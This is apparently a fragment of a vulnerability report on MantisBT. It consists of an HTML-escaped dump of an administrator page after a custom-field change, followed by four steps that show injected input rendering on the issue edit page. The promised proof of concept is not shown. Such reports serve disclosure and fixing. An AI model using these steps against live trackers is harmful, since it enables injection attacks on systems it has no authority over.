Logout&lt;/a></li></ul></li></ul>&lt;/div>&lt;/div>&lt;/div>&lt;div class=&quot;main-container&quot; id=&quot;main-container&quot;>
&lt;div id=&quot;sidebar&quot; class=&quot;sidebar sidebar-fixed responsive compact &quot;>&lt;ul class=&quot;nav nav-list&quot;><li>
&lt;a href=&quot;/mantisbt2/my_view_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-dashboard&quot;></i> 
&lt;span class=&quot;menu-text&quot;> My View &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/view_all_bug_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-list-alt&quot;></i> 
&lt;span class=&quot;menu-text&quot;> View Issues &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/bug_report_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-edit&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Report Issue &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/changelog_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-retweet&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Change Log &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/roadmap_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-road&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Roadmap &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
<li>
&lt;a href=&quot;/mantisbt2/summary_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-bar-chart-o&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Summary &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
&lt;li class=&quot;active&quot;>
&lt;a href=&quot;/mantisbt2/manage_overview_page.php&quot;>
&lt;i class=&quot;menu-icon fa fa-gears&quot;></i> 
&lt;span class=&quot;menu-text&quot;> Manage &lt;/span>
&lt;/a>
&lt;b class=&quot;arrow&quot;></b>
</li>
</ul>&lt;div id=&quot;sidebar-btn&quot; class=&quot;sidebar-toggle sidebar-collapse&quot;>&lt;i data-icon2=&quot;ace-icon fa fa-angle-double-right&quot; data-icon1=&quot;ace-icon fa fa-angle-double-left&quot;
        class=&quot;ace-icon fa fa-angle-double-left&quot;></i>&lt;/div>&lt;/div>&lt;div class=&quot;main-content&quot;>
&lt;div id=&quot;breadcrumbs&quot; class=&quot;breadcrumbs noprint&quot;>
&lt;ul class=&quot;breadcrumb&quot;>
  <li>&lt;i class=&quot;fa fa-user home-icon active&quot;></i>  /mantisbt2/account_page.php
  &lt;span class=&quot;label hidden-xs label-default arrowed&quot;>administrator&lt;/span></li>
</ul>
&lt;div class=&quot;nav-recent hidden-xs&quot;>Recently Visited: /mantisbt2/view.php?id=11, /mantisbt2/view.php?id=4, /mantisbt2/view.php?id=10, /mantisbt2/view.php?id=9, /mantisbt2/view.php?id=8&lt;/div>&lt;div id=&quot;nav-search&quot; class=&quot;nav-search&quot;>&lt;form class=&quot;form-search&quot; method=&quot;post&quot; action=&quot;/mantisbt2/jump_to_bug.php&quot;>&lt;span class=&quot;input-icon&quot;>&lt;input type=&quot;text&quot; name=&quot;bug_id&quot; autocomplete=&quot;off&quot; class=&quot;nav-search-input&quot; placeholder=&quot;Issue #&quot;>&lt;i class=&quot;ace-icon fa fa-search nav-search-icon&quot;></i>&lt;/span>&lt;/form>&lt;/div>
&lt;/div>
  &lt;div class=&quot;page-content&quot;>
&lt;div class=&quot;row&quot;>
&lt;div class=&quot;container-fluid&quot;>&lt;div class=&quot;col-md-12 col-xs-12&quot;>&lt;div class=&quot;space-0&quot;>&lt;/div>&lt;div class=&quot;alert alert-success center&quot;>&lt;p class=&quot;bold bigger-110&quot;>Operation successful.</p><br />&lt;div class=&quot;btn-group&quot;>manage_custom_field_page.php&lt;/div>&lt;/div>&lt;/div>&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;div class=&quot;clearfix&quot;>&lt;/div>
&lt;div class=&quot;space-20&quot;>&lt;/div>
&lt;div class=&quot;footer noprint&quot;>
&lt;div class=&quot;footer-inner&quot;>
&lt;div class=&quot;footer-content&quot;>
&lt;div class=&quot;col-md-6 col-xs-12 no-padding&quot;>
&lt;address>
<strong>Powered by https://www.mantisbt.org</strong> <br>
&lt;small>Copyright &copy; 2000 - 2020 MantisBT Team&lt;/small><br>&lt;small>Contact webmaster@example.com for assistance&lt;/small><br>
&lt;/address>
&lt;/div>
&lt;div class=&quot;col-md-6 col-xs-12&quot;>
&lt;div class=&quot;pull-right&quot; id=&quot;powered-by-mantisbt-logo&quot;>
&lt;a href=&quot;https://www.mantisbt.org&quot; title=&quot;Mantis Bug Tracker: a free and open source web based bug tracking system.&quot;>&lt;img src=&quot;/mantisbt2/images/mantis_logo.png&quot; width=&quot;102&quot; height=&quot;35&quot; alt=&quot;Powered by Mantis Bug Tracker: a free and open source web based bug tracking system.&quot; />&lt;/a>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;/div>
&lt;a class=&quot;btn-scroll-up btn btn-sm btn-inverse display&quot; id=&quot;btn-scroll-up&quot; href=&quot;#&quot;>
&lt;i class=&quot;ace-icon fa fa-angle-double-up icon-only bigger-110&quot;></i>
&lt;/a>
&lt;/div>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/bootstrap-3.4.1.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/moment-with-locales-2.24.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/bootstrap-datetimepicker-4.17.47.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/typeahead.jquery-1.3.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/list-1.5.0.min.js&quot;>&lt;/script>
    &lt;script type=&quot;text/javascript&quot; src=&quot;/mantisbt2/js/ace.min.js&quot;>&lt;/script>
&lt;/body>
&lt;/html>
  1. Link this custom field to your project

  2. Go to any issues with that custom field

  3. Click the Edit button and it should redirect to http://&lt;host>/bug_update_page.php

  4. Find that custom field and you can see another input type

PoC included below